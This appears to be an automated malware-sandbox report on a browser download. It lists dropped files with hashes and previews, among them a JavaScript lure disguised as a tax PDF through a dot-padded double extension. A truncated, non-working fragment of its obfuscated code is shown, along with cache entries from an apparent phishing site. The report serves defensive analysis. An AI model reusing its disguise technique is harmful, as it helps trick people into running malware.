                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):29
                                                                              Entropy (8bit):3.922828737239167
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                              SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                              SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                              SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:customSynchronousLookupUris_0

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\SmartScreen\RemoteData\synchronousLookupUris

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):47
                                                                              Entropy (8bit):4.493433469104717
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                              SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                              SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                              SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:synchronousLookupUris_636976985063396749.rel.v2

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):35302
                                                                              Entropy (8bit):7.99333285466604
                                                                              Encrypted:true
                                                                              SSDEEP:
                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\d329dd81-7363-45fa-a714-ec460d23a97b.tmp

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):4213
                                                                              Entropy (8bit):5.487142149051434
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:966B6D714D6E9CE2E93C9CC5535AC462
                                                                              SHA1:B285E9D315BD86B0E14B3DD2CCC66150268562BC
                                                                              SHA-256:7234EFC60AA07ADA97998DA54CB4768812EB31CB3ABCD01634CFD537C8B29326
                                                                              SHA-512:A8169E47E77BBC176FA7DB36296C84BF01DA14B7574F694B560D726065B6DFEBF700FC733F892B4E029E197154405BFF5BABFB215E3C3F0EF56F4C1328F9B1F8
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmkzx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrAeHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99vxEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9QfYyi8P8sX6oOtpBjEIwFwCFj4cmZD

                                                                              C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf.......................................js (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:24C79C623DE528CAAE3EFA89F1B07626
                                                                              SHA1:68680935241A9846297829693C25DC4D649D3210
                                                                              SHA-256:E53942F4C123FB867C7CC5F2E3769180DFEF7A27B15C61247D25F27CC7FB11DD
                                                                              SHA-512:6B63E7FAFA8B19A60D14B981461890E6884CEC5B1F5F5D12C00DE27DBC654273B236AF83E298B36DDA19A90531CD0740E924A43A81C05C62B4F4E6C3CACCCA46
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:function _QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHLBMrhizUFDvikWhhdzVopPLyjZOVzutVZFwQlCMrDvBWvYCzSITWOySNhhjsCQovYhjKNEwORmcKAPSTXCSbhzViGWCODZHaVbpEMZpWQyPzDpMXzjrENpplFZgArEnrmrodbrZhguPKkWgvrnmEToKEJIpQtWxAvDlCkIdJQQdFPMWCQvPJekWinbFvfcWSuNqEyLYLAXwCpEuOLDfpFRyVbldwPcogIdBNjZzkoTaoiHnrIPAIqEIsOVEguMOFQTrPKWVeZltIGonHnXMaMvJVHwgYNgkJhYBTHnqYzUFbvTSoqZDLFOZAUYMUugzrWXKcgifFxSXUxdQCxKkSmfoGlbjUowuAKHmsuuHyHKjPMIotusNntDwHsGOnBoUeCZASgIsjvhELwNzErmSnHURwBLzmaJwmgROOmYSewrcxyJDOzXVtMGJfKbaRvNZeBdEgYHmcExTRdWJjGTaIvwdlfihPDffoWvserRGJvMjAJuavPUCHGJPCTSCzJHiSabejuztYQAPJtXIMaeDKPxRdhtIwUkOvNjvMcivaMxaIdyFqlmdBDxYvNIklhresteoemEyfUfvWbmzULbOIqSgWQcIxElvPfHDUESAQSbLSAxpIIxv4d9e(_QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHL

                                                                              C:\Users\user\Downloads\Unconfirmed 187370.crdownload (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:24C79C623DE528CAAE3EFA89F1B07626
                                                                              SHA1:68680935241A9846297829693C25DC4D649D3210
                                                                              SHA-256:E53942F4C123FB867C7CC5F2E3769180DFEF7A27B15C61247D25F27CC7FB11DD
                                                                              SHA-512:6B63E7FAFA8B19A60D14B981461890E6884CEC5B1F5F5D12C00DE27DBC654273B236AF83E298B36DDA19A90531CD0740E924A43A81C05C62B4F4E6C3CACCCA46
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:function _QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHLBMrhizUFDvikWhhdzVopPLyjZOVzutVZFwQlCMrDvBWvYCzSITWOySNhhjsCQovYhjKNEwORmcKAPSTXCSbhzViGWCODZHaVbpEMZpWQyPzDpMXzjrENpplFZgArEnrmrodbrZhguPKkWgvrnmEToKEJIpQtWxAvDlCkIdJQQdFPMWCQvPJekWinbFvfcWSuNqEyLYLAXwCpEuOLDfpFRyVbldwPcogIdBNjZzkoTaoiHnrIPAIqEIsOVEguMOFQTrPKWVeZltIGonHnXMaMvJVHwgYNgkJhYBTHnqYzUFbvTSoqZDLFOZAUYMUugzrWXKcgifFxSXUxdQCxKkSmfoGlbjUowuAKHmsuuHyHKjPMIotusNntDwHsGOnBoUeCZASgIsjvhELwNzErmSnHURwBLzmaJwmgROOmYSewrcxyJDOzXVtMGJfKbaRvNZeBdEgYHmcExTRdWJjGTaIvwdlfihPDffoWvserRGJvMjAJuavPUCHGJPCTSCzJHiSabejuztYQAPJtXIMaeDKPxRdhtIwUkOvNjvMcivaMxaIdyFqlmdBDxYvNIklhresteoemEyfUfvWbmzULbOIqSgWQcIxElvPfHDUESAQSbLSAxpIIxv4d9e(_QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHL

                                                                              C:\Users\user\Downloads\fd870463-4b90-4d4c-95db-b7afc2afd181.tmp

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):130015
                                                                              Entropy (8bit):5.815058363490485
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:24C79C623DE528CAAE3EFA89F1B07626
                                                                              SHA1:68680935241A9846297829693C25DC4D649D3210
                                                                              SHA-256:E53942F4C123FB867C7CC5F2E3769180DFEF7A27B15C61247D25F27CC7FB11DD
                                                                              SHA-512:6B63E7FAFA8B19A60D14B981461890E6884CEC5B1F5F5D12C00DE27DBC654273B236AF83E298B36DDA19A90531CD0740E924A43A81C05C62B4F4E6C3CACCCA46
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:function _QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHLBMrhizUFDvikWhhdzVopPLyjZOVzutVZFwQlCMrDvBWvYCzSITWOySNhhjsCQovYhjKNEwORmcKAPSTXCSbhzViGWCODZHaVbpEMZpWQyPzDpMXzjrENpplFZgArEnrmrodbrZhguPKkWgvrnmEToKEJIpQtWxAvDlCkIdJQQdFPMWCQvPJekWinbFvfcWSuNqEyLYLAXwCpEuOLDfpFRyVbldwPcogIdBNjZzkoTaoiHnrIPAIqEIsOVEguMOFQTrPKWVeZltIGonHnXMaMvJVHwgYNgkJhYBTHnqYzUFbvTSoqZDLFOZAUYMUugzrWXKcgifFxSXUxdQCxKkSmfoGlbjUowuAKHmsuuHyHKjPMIotusNntDwHsGOnBoUeCZASgIsjvhELwNzErmSnHURwBLzmaJwmgROOmYSewrcxyJDOzXVtMGJfKbaRvNZeBdEgYHmcExTRdWJjGTaIvwdlfihPDffoWvserRGJvMjAJuavPUCHGJPCTSCzJHiSabejuztYQAPJtXIMaeDKPxRdhtIwUkOvNjvMcivaMxaIdyFqlmdBDxYvNIklhresteoemEyfUfvWbmzULbOIqSgWQcIxElvPfHDUESAQSbLSAxpIIxv4d9e(_QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHL

                                                                              Chrome Cache Entry: 234

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text
                                                                              Category:downloaded
                                                                              Size (bytes):356
                                                                              Entropy (8bit):5.3412711221156
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:F69B5890EAB9514CA4171F0E1D210FA9
                                                                              SHA1:A37996A3A0B5C86AB6976F8C628E43AFBA02B937
                                                                              SHA-256:4AF4DB14D712108FC668D358A80B03D5684A111A2FB6F4AB2071FF0C64FE8923
                                                                              SHA-512:9241AB96FD4862351BF18A79BF0B7591ED42BF8CEB2DFBA215DFB764555C6859C59F9F331A025557882E6C3A3F9A6D15BADF26090EAA3951D170F67D20D8C86A
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/assets/css/styles.css?v=1.0
                                                                              Preview:<html>.<head><title>404 Not Found</title></head>.<body>.<h1>404 Not Found</h1>.<ul>.<li>Code: NoSuchKey</li>.<li>Message: The specified key does not exist.</li>.<li>Key: assets/css/styles.css</li>.<li>RequestId: V6P4J6QBD4Y9306W</li>.<li>HostId: H2IWfleTcIS9l5f5CDzFeQ9eM/lu7ODZz3PYvC/PZpIyTqZcWNXFwObe3GVpiIOHnnyYsuPh1Qw=</li>.</ul>.<hr/>.</body>.</html>.

                                                                              Chrome Cache Entry: 235

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (1572)
                                                                              Category:downloaded
                                                                              Size (bytes):6193
                                                                              Entropy (8bit):5.401714743814202
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:F2D1D2937C3546E15C471236646AC74E
                                                                              SHA1:DD8D90F6D4AC8D72C718C10424788612689D89DB
                                                                              SHA-256:719D2FC548145FA8D8361205F6FCB49EEFC54C71FBB18E6320A60A263F40637A
                                                                              SHA-512:7B400281407249F805AB4695E0B7D3CDF4F7F5F776F9F7E60872D5208B7324DADDDAD79D76AC9991C74563520FB6BFF3A6343C8C10591C9EB5682733592668A4
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://fonts.googleapis.com/css?family=Open+Sans&display=swap
                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4taVIGxA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4kaVIGxA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4saVIGxA.woff2) for

                                                                              Chrome Cache Entry: 236

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 354 x 56, 8-bit/color RGBA, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):11122
                                                                              Entropy (8bit):7.978590954352468
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:C0A0C1D28F7B5DF1A78D8F2ECEACC3FE
                                                                              SHA1:B4A3E4D73ADE33D090BBB7BC733647650F4C852A
                                                                              SHA-256:2C1DACA7627C1DF4A1D013A61079162C281EABF025771BEB7B0C522064F9AFC7
                                                                              SHA-512:E2CCF53E26B67ECF7CCC5F307D61FA6673AB7B5E27BF4F8D60C69706F5844B0652F06942CB38AD3DACF8A865028E8EC984E4A0CC8F11A19CE9BBFBA557435BE3
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://d12bxbf7nz45kt.cloudfront.net/images/DrakePortals-logo.png
                                                                              Preview:.PNG........IHDR...b...8......>._....gAMA......a...+)IDATx...|....w.N.U...i.B.dcp...1.FO(.. .. ..@.....@.../$...c.!..`.).$..$...e...n....N...+..dt..iw..y.v..7of..........njj....r....##.{C...C..mz...[.P.....9.3t..3....B.74#..`...u.K.....8....r.4..VO.gP..h..t..p-....~x.H..".i...tM...^-^\.jw....S.L.V.Y.I..R...V?:....~._... r7..H...u.FEFF.+W...1c:..S.N=.g.......T..8:R.g....d.....q8u=..UD[-.1.h.#h.y\.j....Bh.G..Bh...T..Y.......6n.8../.6}..q.~^.}J..)...K..._j.6..+.g.N.E...Oj..5..~....e..6#8*\...k.V&\H:c...................H...#H2..\.....U.4..-Y...SQyu...[Z.p@Oa...q...>o..)._A.>.gG.;...Q.9`...Q...1.YQ;w...J'X...i.......!...OC.....lj.%!..4....P..x....y%.......&a.p......q..=..|vNv../.......t5S..e.....v.Z..;.oc..nhj.Bf.....<.A.9...p..........65...L.X\...).@.............d...q.p4.......*.j......5..9 ...k&......../!....40+[.eR.[W.!.r.7.y...O.V./.|... .eOBO.f....a<^....S.t..4,.Tp..w>)^\. .{.p.'1Q...4..R.=.....s..m..1r8g.. ...........k.0..a......*..M.Y.

                                                                              Chrome Cache Entry: 237

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                                                              Category:dropped
                                                                              Size (bytes):34494
                                                                              Entropy (8bit):3.7755544493355853
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:5ABE6EEADC57F022F4DD4B82CCE75677
                                                                              SHA1:029EEE5D20FB563D74C6B57DDD71CF920FE2EE39
                                                                              SHA-256:FE7A3203E489CE7697149A0A980E9A3AD314EE1C414F753CB26E3D165EB31DA0
                                                                              SHA-512:688A0DB3AA0A1AB048EA1A275F32E20F05FE5F63508B9F2FCE4C02AA6BA4AA902471AC93699D68023752E483C5A06D83DDF43F4AF9888E9936E693DB186AAE61
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:............ .h...V......... ......... .... .....F...00.... ..%......@@.... .(B...D..(....... ..... ..............................m...u...u...u...u...u...u...u...u...u...u...u...u...u...X../....u...u...u...u...u...u...u...u...u...u...u...u...u...u..uI.~<%.:.u...u...u...u...u...u...u...u...u...u...u...u...u...u.._;.P]:.^.u...u...u...u...u...u...u...u...u...u...u...u...u...u..4 .$.\$..u...u...u...u...u...u...u...u...u...u...u...u...u...u..YD'..X...u...u...u...u...u...u...u...u...u...u...u...u...u...m..`?.@.u".u...u...u...u...u...u...u...u...u...u...u...u...u...X..~N.n.u..u...u...u...u...u...u...u...u...u...u...u...u...u..iB.l.\...X...X...X...X...X...X...X...X...X...X...X...X...X...Y..A).$.u......~L.NxK.fxK.fxK.fxK.fxK.fxK.fxK.fxK.fxK.fxK.fxK.fxK.j.i..u.......u..u...u...u...u...u...u...u...u...u...u...u...u...u...u.......u..u...u...u...u...u...u...u...u...u...u...u...u...u...u.......u..u...u...u...u...u...u...u...s..s..s..s..s..s..w+......u..V..4!.B4!.B4!.B4!.B.a...i........

                                                                              Chrome Cache Entry: 238

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (692)
                                                                              Category:downloaded
                                                                              Size (bytes):23437
                                                                              Entropy (8bit):4.584919480879259
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:AEAB3518EE934689F268901658C08BF8
                                                                              SHA1:9E5189CAAF6F0973DFCECFA0C630E66442E88705
                                                                              SHA-256:C29E5BA0A5D5E8D14F88A0708395D95560BE4186880A5EC49C3CDD054DAAD356
                                                                              SHA-512:AF996CCC1ADDD58F09DBA20102C33D7B4C10A955D3878B780189254ACFE8A598668BFF4C18DC45B5B1AB574E49CDEABE3F52C61753248431543F0C7F0E125B85
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/assets/sfp.html
                                                                              Preview:<!doctype html>..<html lang="en">.<head>. <meta charset="utf-8">.. <title>SecureFilePro</title>. <meta name="description" content="The HTML5 Herald">. <meta name="author" content="SitePoint">.. <link rel="stylesheet" href="css/styles.css?v=1.0">. <style>. @import url('https://fonts.googleapis.com/css?family=Open+Sans&display=swap');..@media only screen and (min-width:481px) and (max-width:1024px) {.. html {height:100%}. body {height:100%;font-family: 'Source Sans Pro', sans-serif !important;font-size: 16px;font-weight: 400;font-style: normal;}. #top {position:relative; width:100%; margin:0 auto;margin-top: 80px;}. #leftbox {width:49%;display: inline-block;height: 100%;vertical-align: top;}. #rightbox {width:46%;display: inline-block;height: 100%;vertical-align: top;}. .rightboxText h3,.rightboxText p {display:

                                                                              Chrome Cache Entry: 239

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (31980)
                                                                              Category:downloaded
                                                                              Size (bytes):36978
                                                                              Entropy (8bit):5.19395713834114
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:4B92E632306B308D628B73AD45C14376
                                                                              SHA1:22FEDDCB247D815FD728A8861D1509A7DDE1DAFB
                                                                              SHA-256:4053009B8C5F944443521D0D758D696B4F8CA2F18D35D33C81D6BFFEA0D11FAE
                                                                              SHA-512:2678C6F96B79DC6B295105D085CF9CE23F1204446C8090281DE7A16A028797140DF8CB420A61438215FDFC071B924351669B72654E330BCBAD2B9F4CE4BE3923
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/alertify.min.js
                                                                              Preview:/*! alertifyjs - v1.13.1 - Mohammad Younes <Mohammad@alertifyjs.com> (http://alertifyjs.com) */.!function(a){"use strict";function b(a,b){a.className+=" "+b}function c(a,b){for(var c=a.className.split(" "),d=b.split(" "),e=0;e<d.length;e+=1){var f=c.indexOf(d[e]);f>-1&&c.splice(f,1)}a.className=c.join(" ")}function d(){return"rtl"===a.getComputedStyle(document.body).direction}function e(){return document.documentElement&&document.documentElement.scrollTop||document.body.scrollTop}function f(){return document.documentElement&&document.documentElement.scrollLeft||document.body.scrollLeft}function g(a){for(;a.lastChild;)a.removeChild(a.lastChild)}function h(a){if(null===a)return a;var b;if(Array.isArray(a)){b=[];for(var c=0;c<a.length;c+=1)b.push(h(a[c]));return b}if(a instanceof Date)return new Date(a.getTime());if(a instanceof RegExp)return b=new RegExp(a.source),b.global=a.global,b.ignoreCase=a.ignoreCase,b.multiline=a.multiline,b.lastIndex=a.lastIndex,b;if("object"==typeof a){b={};for

                                                                              Chrome Cache Entry: 240

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Unicode text, UTF-8 text, with very long lines (63404)
                                                                              Category:downloaded
                                                                              Size (bytes):1534944
                                                                              Entropy (8bit):5.663245327142174
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:75412BD2D12A555F74D4691277E1CD4A
                                                                              SHA1:64A777235308A4733B072A917B82DB04A322C9B1
                                                                              SHA-256:2F7B2D2032C370EF269FCD84BDB8FBBD1B9005BDAC62107F22250594E42ED654
                                                                              SHA-512:3786745F4D654E028D2EAC8B15C074C31EA8F56041426119312534362E087EF8C9D6A3EC1CD951E4D86BA5AC0586A68ED321CDBCFEA3A9FDF5E3AD3A66572521
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.js
                                                                              Preview:/*! For license information please see index.browser.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.JavaScriptObfuscator=t():e.JavaScriptObfuscator=t()}(self,(()=>(()=>{var e={3913:(e,t,r)=>{!function(){"use strict";var e,n,i,a,o,s,c,u,l,d,p,f,m,h,g,y,b,S,v,C,A,_,E,N,I,T;function D(e){return Y.Statement.hasOwnProperty(e.type)}o=r(2993),s=r(649),e=o.Syntax,i={"??":(n={Sequence:0,Yield:1,Assignment:1,Conditional:2,ArrowFunction:2,NullishCoalescing:3,LogicalOR:3,LogicalAND:4,BitwiseOR:5,BitwiseXOR:6,BitwiseAND:7,Equality:8,Relational:9,BitwiseSHIFT:10,Additive:11,Multiplicative:12,Exponentiation:13,Await:14,Unary:14,Postfix:15,OptionalChaining:16,Call:17,New:18,TaggedTemplate:19,Member:20,Primary:21}).NullishCoalescing,"||":n.LogicalOR,"&&":n.LogicalAND,"|":n.BitwiseOR,"^":n.BitwiseXOR,"&":n.BitwiseAND,"==":n.Equality,"!=":n.Equality,"===":n.Equality,"

                                                                              Chrome Cache Entry: 241

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (55351), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):55403
                                                                              Entropy (8bit):5.850845075975984
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:82ABC3C6F25FEC8BEF2540255F25E155
                                                                              SHA1:413CB14082A62B4C064A66B6C7C6FA7BB0BFA0F8
                                                                              SHA-256:2F2F2FD079BF29AA8D2164391E8CDCE8D73248D3DE959D2FE2D8006BC924AD73
                                                                              SHA-512:37224DC06B74D2A1401A2DED05054EA5158005C777535D96D1A1252F838FB23EBA63A2D03C6A9950431D0AC8090F61BFB156949D6D5E6D2A6F424EAFCBD2535D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://securefilepro.netlify.app/
